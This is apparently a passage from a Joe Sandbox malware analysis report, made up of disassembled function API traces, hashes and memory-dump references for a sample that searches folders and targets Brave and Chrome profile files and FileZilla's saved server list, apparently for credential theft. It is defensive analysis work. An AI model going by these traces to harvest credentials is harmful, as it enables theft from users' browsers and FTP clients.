                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                  • String ID: \*.*
                                  • API String ID: 4127656590-1173974218
                                  • Opcode ID: 68cd80a979535a97de866f127c76e6a3042f28859a98502f309ad37b561ded2c
                                  • Instruction ID: fe3d9e53bc36a650f7a289fd4bcdbfb80f8e71f35128f2b55f4c9eed15d5c602
                                  • Opcode Fuzzy Hash: 68cd80a979535a97de866f127c76e6a3042f28859a98502f309ad37b561ded2c
                                  • Instruction Fuzzy Hash: EF926C3191161AABCB23AF64DD89AAF77F9AF14300F454124F809AF211DB34FD95DBA0
                                  Function 0034DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DBEF
                                  • lstrlen.KERNEL32(00374CA8), ref: 0034DBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DC17
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 0034DC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DC4C
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DC8F
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0034DCD0
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0034DCF0
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0034DD0A
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0034DD1D
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034DD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DD7B
                                  • lstrlen.KERNEL32(00371794), ref: 0034DD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DDA3
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DDAF
                                  • lstrlen.KERNEL32(?), ref: 0034DDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 0034DDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DE19
                                  • lstrlen.KERNEL32(00371794), ref: 0034DE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034DE6F
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DE7B
                                  • lstrlen.KERNEL32(00FA89E8), ref: 0034DE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DEBB
                                  • lstrlen.KERNEL32(00371794), ref: 0034DEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034DEE6
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DEF2
                                  • lstrlen.KERNEL32(00FA87F8), ref: 0034DF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DFA5
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034DFB1
                                  • lstrlen.KERNEL32(00FA89E8), ref: 0034DFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034DFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034DFF4
                                  • lstrlen.KERNEL32(00371794), ref: 0034DFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E022
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034E02E
                                  • lstrlen.KERNEL32(00FA87F8), ref: 0034E03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034E06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 0034E0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 0034E0E7
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034E11F
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0034E12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E155
                                  • lstrcat.KERNEL32(00000000,?), ref: 0034E15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E19F
                                  • lstrcat.KERNEL32(00000000), ref: 0034E1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0034E1F9
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034E22F
                                  • lstrlen.KERNEL32(00FA8858), ref: 0034E23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E261
                                  • lstrcat.KERNEL32(00000000,00FA8858), ref: 0034E269
                                  • lstrlen.KERNEL32(\Brave\Preferences), ref: 0034E274
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E29B
                                  • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0034E2A7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E2CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E30F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E349
                                  • DeleteFileA.KERNEL32(?), ref: 0034E381
                                  • StrCmpCA.SHLWAPI(?,00FAC638), ref: 0034E3AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E3F4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E41C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E445
                                  • StrCmpCA.SHLWAPI(?,00FA87F8), ref: 0034E468
                                  • StrCmpCA.SHLWAPI(?,00FA89E8), ref: 0034E47D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E4D9
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0034E4E0
                                  • StrCmpCA.SHLWAPI(?,00FAC470), ref: 0034E58E
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034E5C4
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0034E639
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E678
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E6A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E6C7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E70E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E737
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E75C
                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0034E776
                                  • DeleteFileA.KERNEL32(?), ref: 0034E7D2
                                  • StrCmpCA.SHLWAPI(?,00FA8928), ref: 0034E7FC
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E88C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E8B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E8EE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034E916
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034E952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 2635522530-726946144
                                  • Opcode ID: 3175d9af235cbf78de5e4a3aa5e8dd26d4d751191043925d0a61e5c93d683f55
                                  • Instruction ID: 40de5bb77f2202b4df2972b2f70a160ce9bff22707759e9eee6766357ca9aaa2
                                  • Opcode Fuzzy Hash: 3175d9af235cbf78de5e4a3aa5e8dd26d4d751191043925d0a61e5c93d683f55
                                  • Instruction Fuzzy Hash: 88926E719102069BCB22EF64DC89AAE7BF9BF54300F454568F809AF251DB34FC59DBA0
                                  Function 003518A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003518D2
                                  • lstrlen.KERNEL32(\*.*), ref: 003518DD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003518FF
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 0035190B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351932
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00351947
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 00351967
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 00351981
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003519BF
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003519F2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351A1A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00351A25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351A4C
                                  • lstrlen.KERNEL32(00371794), ref: 00351A5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351A80
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351AB4
                                  • lstrlen.KERNEL32(?), ref: 00351AC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351AE5
                                  • lstrcat.KERNEL32(00000000,?), ref: 00351AF3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351B19
                                  • lstrlen.KERNEL32(00FA8958), ref: 00351B2F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351B59
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00351B64
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351B8F
                                  • lstrlen.KERNEL32(00371794), ref: 00351BA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351BC3
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351BCF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351BF8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351C25
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00351C30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351C57
                                  • lstrlen.KERNEL32(00371794), ref: 00351C69
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351C8B
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351C97
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351CC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351CEF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00351CFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351D21
                                  • lstrlen.KERNEL32(00371794), ref: 00351D33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351D55
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351D61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351D8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351DB9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00351DC4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351DED
                                  • lstrlen.KERNEL32(00371794), ref: 00351E19
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351E36
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351E42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351E68
                                  • lstrlen.KERNEL32(00FAC710), ref: 00351E7E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351EB2
                                  • lstrlen.KERNEL32(00371794), ref: 00351EC6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351EE3
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351EEF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351F15
                                  • lstrlen.KERNEL32(00FAD270), ref: 00351F2B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351F5F
                                  • lstrlen.KERNEL32(00371794), ref: 00351F73
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351F90
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351F9C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351FC2
                                  • lstrlen.KERNEL32(00F9AE28), ref: 00351FD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352000
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035200B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352036
                                  • lstrlen.KERNEL32(00371794), ref: 00352048
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352067
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00352073
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352098
                                  • lstrlen.KERNEL32(?), ref: 003520AC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003520D0
                                  • lstrcat.KERNEL32(00000000,?), ref: 003520DE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352103
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035213F
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0035214E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00352176
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00352181
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                  • String ID: \*.*
                                  • API String ID: 712834838-1173974218
                                  • Opcode ID: 874188edf398ce7545a9da34bf9b29dd38e74e5b456fb77e681df0106d390532
                                  • Instruction ID: ff0db493b6397fd4a5c01ef3017687f231439a1f78afc8e8e708c50ced9e1963
                                  • Opcode Fuzzy Hash: 874188edf398ce7545a9da34bf9b29dd38e74e5b456fb77e681df0106d390532
                                  • Instruction Fuzzy Hash: D462BD31911616ABCB23AF64DC89EBF77B9AF54701F450024FC09AB260DB34ED59DBA0
                                  Function 00353910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0035392C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00353943
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035396C
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 00353986
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003539BF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003539E7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003539F2
                                  • lstrlen.KERNEL32(00371794), ref: 003539FD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353A1A
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353A26
                                  • lstrlen.KERNEL32(?), ref: 00353A33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353A53
                                  • lstrcat.KERNEL32(00000000,?), ref: 00353A61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353A8A
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00353ACE
                                  • lstrlen.KERNEL32(?), ref: 00353AD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353B05
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353B10
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353B36
                                  • lstrlen.KERNEL32(00371794), ref: 00353B48
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353B6A
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353B76
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353B9E
                                  • lstrlen.KERNEL32(?), ref: 00353BB2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353BD2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00353BE0
                                  • lstrlen.KERNEL32(00FA8858), ref: 00353C0B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353C31
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353C3C
                                  • lstrlen.KERNEL32(00FA8958), ref: 00353C5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353C84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353C8F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353CB7
                                  • lstrlen.KERNEL32(00371794), ref: 00353CC9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353CE8
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353CF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353D1A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00353D47
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353D52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353D79
                                  • lstrlen.KERNEL32(00371794), ref: 00353D8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353DAD
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353DB9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353E11
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353E1C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353E43
                                  • lstrlen.KERNEL32(00371794), ref: 00353E55
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353E77
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353E83
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353EAC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353EDB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00353EE6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353F0D
                                  • lstrlen.KERNEL32(00371794), ref: 00353F1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353F41
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00353F4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353F75
                                  • lstrlen.KERNEL32(?), ref: 00353F89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353FA9
                                  • lstrcat.KERNEL32(00000000,?), ref: 00353FB7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00353FE0
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035401F
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0035402E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354056
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00354061
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035408A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003540CE
                                  • lstrcat.KERNEL32(00000000), ref: 003540DB
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003542D9
                                  • FindClose.KERNEL32(00000000), ref: 003542E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 1006159827-1013718255
                                  • Opcode ID: db71b2644b607f4f0fe3999c46c73f5052a10d81e8deaffe03971d3098661201
                                  • Instruction ID: f9ce50046cb944f7c5ed6ee1bf41f63fd41dd2dff009e3a1cb5caa473e6e5610
                                  • Opcode Fuzzy Hash: db71b2644b607f4f0fe3999c46c73f5052a10d81e8deaffe03971d3098661201
                                  • Instruction Fuzzy Hash: CD62E431911616ABCB23AF64DC49EAF77F9AF14301F454124FC09AB260DB34EE59DBA0
                                  Function 00356960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356995
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003569C8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356A29
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00356A34
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356A5D
                                  • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00356A77
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356A99
                                  • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00356AA5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356AD0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356B00
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00356B35
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356B9D
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356BCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
